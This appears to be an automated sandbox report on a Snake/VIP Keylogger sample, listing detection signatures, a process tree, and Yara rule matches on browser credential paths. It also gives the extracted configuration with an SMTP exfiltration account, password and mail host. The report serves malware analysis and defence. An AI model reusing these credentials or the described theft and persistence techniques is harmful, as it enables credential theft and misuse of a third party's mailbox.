Edit tour

Windows Analysis Report
FACT0987789000900.exe

Overview

General Information

Sample name:	FACT0987789000900.exe
Analysis ID:	1583657
MD5:	e4da22458c317595e4bd6712b4728d36
SHA1:	111a5c4cbd45bced7c04cbeb5192a9afe178865c
SHA256:	f3530f9d52d1ba3ed70cc5d603cf0a83771027cda5fd545206e1688589ef69fd
Tags:	exeinfostealermalwareuser-Joker
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

FACT0987789000900.exe (PID: 5428 cmdline: "C:\Users\user\Desktop\FACT0987789000900.exe" MD5: E4DA22458C317595E4BD6712B4728D36)

juvenile.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\FACT0987789000900.exe" MD5: E4DA22458C317595E4BD6712B4728D36)

svchost.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\FACT0987789000900.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

wscript.exe (PID: 7516 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

juvenile.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Local\thixolabile\juvenile.exe" MD5: E4DA22458C317595E4BD6712B4728D36)

svchost.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\thixolabile\juvenile.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@2wapartments.com", "Password": "diezcansecoinfo24", "Host": "mail.2wapartments.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@2wapartments.com", "Password": "diezcansecoinfo24", "Host": "mail.2wapartments.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2543748879.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35264:$a1: get_encryptedPassword 0x35238:$a2: get_encryptedUsername 0x352fc:$a3: get_timePasswordChanged 0x35214:$a4: get_passwordField 0x3527a:$a5: set_encryptedPassword 0x35047:$a7: get_logins 0x30932:$a10: KeyLoggerEventArgs 0x30901:$a11: KeyLoggerEventArgsEventHandler 0x3511b:$a13: _encryptedPassword
00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e65d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ba:$a4: \Orbitum\User Data\Default\Login Data 0x3f299:$a5: \Kometa\User Data\Default\Login Data
00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e51:$s1: UnHook 0x32ded:$s2: SetHook 0x32e26:$s3: CallNextHook 0x32db5:$s4: _hook
00000008.00000002.2543753566.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36184:$a1: get_encryptedPassword 0x36158:$a2: get_encryptedUsername 0x3621c:$a3: get_timePasswordChanged 0x36134:$a4: get_passwordField 0x3619a:$a5: set_encryptedPassword 0x35f67:$a7: get_logins 0x31852:$a10: KeyLoggerEventArgs 0x31821:$a11: KeyLoggerEventArgsEventHandler 0x3603b:$a13: _encryptedPassword
0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3feda:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f57d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7da:$a4: \Orbitum\User Data\Default\Login Data 0x401b9:$a5: \Kometa\User Data\Default\Login Data
0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d71:$s1: UnHook 0x33d0d:$s2: SetHook 0x33d46:$s3: CallNextHook 0x33cd5:$s4: _hook
0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36184:$a1: get_encryptedPassword 0x36158:$a2: get_encryptedUsername 0x3621c:$a3: get_timePasswordChanged 0x36134:$a4: get_passwordField 0x3619a:$a5: set_encryptedPassword 0x35f67:$a7: get_logins 0x31852:$a10: KeyLoggerEventArgs 0x31821:$a11: KeyLoggerEventArgsEventHandler 0x3603b:$a13: _encryptedPassword
0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3feda:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f57d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7da:$a4: \Orbitum\User Data\Default\Login Data 0x401b9:$a5: \Kometa\User Data\Default\Login Data
0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d71:$s1: UnHook 0x33d0d:$s2: SetHook 0x33d46:$s3: CallNextHook 0x33cd5:$s4: _hook
0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35264:$a1: get_encryptedPassword 0x35238:$a2: get_encryptedUsername 0x352fc:$a3: get_timePasswordChanged 0x35214:$a4: get_passwordField 0x3527a:$a5: set_encryptedPassword 0x35047:$a7: get_logins 0x30932:$a10: KeyLoggerEventArgs 0x30901:$a11: KeyLoggerEventArgsEventHandler 0x3511b:$a13: _encryptedPassword
0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e65d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ba:$a4: \Orbitum\User Data\Default\Login Data 0x3f299:$a5: \Kometa\User Data\Default\Login Data
0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e51:$s1: UnHook 0x32ded:$s2: SetHook 0x32e26:$s3: CallNextHook 0x32db5:$s4: _hook
00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36184:$a1: get_encryptedPassword 0x36158:$a2: get_encryptedUsername 0x3621c:$a3: get_timePasswordChanged 0x36134:$a4: get_passwordField 0x3619a:$a5: set_encryptedPassword 0x35f67:$a7: get_logins 0x31852:$a10: KeyLoggerEventArgs 0x31821:$a11: KeyLoggerEventArgsEventHandler 0x3603b:$a13: _encryptedPassword
00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3feda:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f57d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7da:$a4: \Orbitum\User Data\Default\Login Data 0x401b9:$a5: \Kometa\User Data\Default\Login Data
00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d71:$s1: UnHook 0x33d0d:$s2: SetHook 0x33d46:$s3: CallNextHook 0x33cd5:$s4: _hook
00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36192:$a1: get_encryptedPassword 0x36166:$a2: get_encryptedUsername 0x3622a:$a3: get_timePasswordChanged 0x36142:$a4: get_passwordField 0x361a8:$a5: set_encryptedPassword 0x35f75:$a7: get_logins 0x31860:$a10: KeyLoggerEventArgs 0x3182f:$a11: KeyLoggerEventArgsEventHandler 0x36049:$a13: _encryptedPassword
00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36192:$a1: get_encryptedPassword 0x36166:$a2: get_encryptedUsername 0x3622a:$a3: get_timePasswordChanged 0x36142:$a4: get_passwordField 0x361a8:$a5: set_encryptedPassword 0x35f75:$a7: get_logins 0x31860:$a10: KeyLoggerEventArgs 0x3182f:$a11: KeyLoggerEventArgsEventHandler 0x36049:$a13: _encryptedPassword
00000006.00000002.1322250001.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000A.00000002.1448696408.0000000003C60000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36184:$a1: get_encryptedPassword 0x36158:$a2: get_encryptedUsername 0x3621c:$a3: get_timePasswordChanged 0x36134:$a4: get_passwordField 0x3619a:$a5: set_encryptedPassword 0x35f67:$a7: get_logins 0x31852:$a10: KeyLoggerEventArgs 0x31821:$a11: KeyLoggerEventArgsEventHandler 0x3603b:$a13: _encryptedPassword
00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3feda:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f57d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7da:$a4: \Orbitum\User Data\Default\Login Data 0x401b9:$a5: \Kometa\User Data\Default\Login Data
00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d71:$s1: UnHook 0x33d0d:$s2: SetHook 0x33d46:$s3: CallNextHook 0x33cd5:$s4: _hook
0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: svchost.exe PID: 7344	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 7344	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: svchost.exe PID: 7344	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: svchost.exe PID: 7344	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x184d6:$a1: get_encryptedPassword 0x9a712:$a1: get_encryptedPassword 0xdc9c7:$a1: get_encryptedPassword 0xeda66:$a1: get_encryptedPassword 0x184aa:$a2: get_encryptedUsername 0x9a6e6:$a2: get_encryptedUsername 0xdc99b:$a2: get_encryptedUsername 0xeda3a:$a2: get_encryptedUsername 0x1856e:$a3: get_timePasswordChanged 0x9a7aa:$a3: get_timePasswordChanged 0xdca5f:$a3: get_timePasswordChanged 0xedafe:$a3: get_timePasswordChanged 0x18486:$a4: get_passwordField 0x9a6c2:$a4: get_passwordField 0xdc977:$a4: get_passwordField 0xeda16:$a4: get_passwordField 0x184ec:$a5: set_encryptedPassword 0x9a728:$a5: set_encryptedPassword 0xdc9dd:$a5: set_encryptedPassword 0xeda7c:$a5: set_encryptedPassword 0x182c2:$a7: get_logins
Process Memory Space: svchost.exe PID: 7588	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 7588	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: svchost.exe PID: 7588	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: svchost.exe PID: 7588	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x931f:$a1: get_encryptedPassword 0x5526d:$a1: get_encryptedPassword 0x6f6ab:$a1: get_encryptedPassword 0xff402:$a1: get_encryptedPassword 0x92f3:$a2: get_encryptedUsername 0x55241:$a2: get_encryptedUsername 0x6f67f:$a2: get_encryptedUsername 0xff3d6:$a2: get_encryptedUsername 0x93b7:$a3: get_timePasswordChanged 0x55305:$a3: get_timePasswordChanged 0x6f743:$a3: get_timePasswordChanged 0xff49a:$a3: get_timePasswordChanged 0x92cf:$a4: get_passwordField 0x5521d:$a4: get_passwordField 0x6f65b:$a4: get_passwordField 0xff3b2:$a4: get_passwordField 0x9335:$a5: set_encryptedPassword 0x55283:$a5: set_encryptedPassword 0x6f6c1:$a5: set_encryptedPassword 0xff418:$a5: set_encryptedPassword 0x910b:$a7: get_logins
Click to see the 61 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.svchost.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
6.2.juvenile.exe.3da0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.svchost.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.svchost.exe.7d30f20.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
